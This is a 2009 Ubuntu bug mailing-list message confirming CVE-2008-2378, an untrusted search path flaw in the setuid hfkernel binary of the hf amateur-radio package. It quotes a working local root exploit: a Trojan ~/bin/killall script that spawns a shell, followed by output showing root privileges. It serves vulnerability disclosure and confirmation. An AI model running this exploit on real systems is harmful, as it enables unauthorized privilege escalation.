[Bug 320082] Re: [CVE-2008-2378] - Untrusted search path vulnerability in hfkernel in hf 0.7.3 and 0.8 allows local users to gain privileges via a Trojan horse
Stefan Lesicnik
stefan at lsd.co.za
Mon Jan 26 13:12:21 UTC 2009
I can confirm this bug as tested in a chroot environment.
Below is an extract from the Debian bug and functioned the same. It
relies on ~/bin being in the $PATH, which is the default .profile
function if a ~/bin directory exists.
The hf package, Described by Debian as an amateur-radio protocol suite
using a soundcard as a modem, is a program that eventually becomes
setuid(0), and has a trivial security hole in it.
By default the package installs "/usr/bin/hfkernel" as a typical binary,
but when first started via the program "hf" the binary is changed to
be setuid(root).
This is demonstrated:
skx at gold:~$ hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. Be aware that this can be a security hole.
Please do as root "chmod 4755 /usr/bin/hfkernel".
or start this script again as root.
If you do start the program as root the permissions are changed:
skx at gold:~$ sudo hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. But be aware that this can be a security hole.
I will do this now "chmod 4755 /usr/bin/hfkernel".
For you, root, I will start only hfkernel for test purposes.
...
Now the program is setuid:
skx at gold:~$ ls -l /usr/bin/hfkernel
-rwsr-xr-x 1 root root 244120 2008-05-07 19:37 /usr/bin/hfkernel
Creating ~/bin/killall is sufficient to gain root privileges.
skx at gold:~$ echo -e '#!/bin/sh\n/bin/sh' > ~bin/killall
skx at gold:~$ chmod 755 ~/bin/killall
skx at gold:~$ hfkernel -k
sh-3.2# id
uid=1000(skx) gid=1000(skx) euid=0(root)
--
[CVE-2008-2378] - Untrusted search path vulnerability in hfkernel in hf 0.7.3 and 0.8 allows local users to gain privileges via a Trojan horse
https://bugs.launchpad.net/bugs/320082
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
--
ubuntu-bugs mailing list
ubuntu-bugs at lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
More information about the universe-bugs
mailing list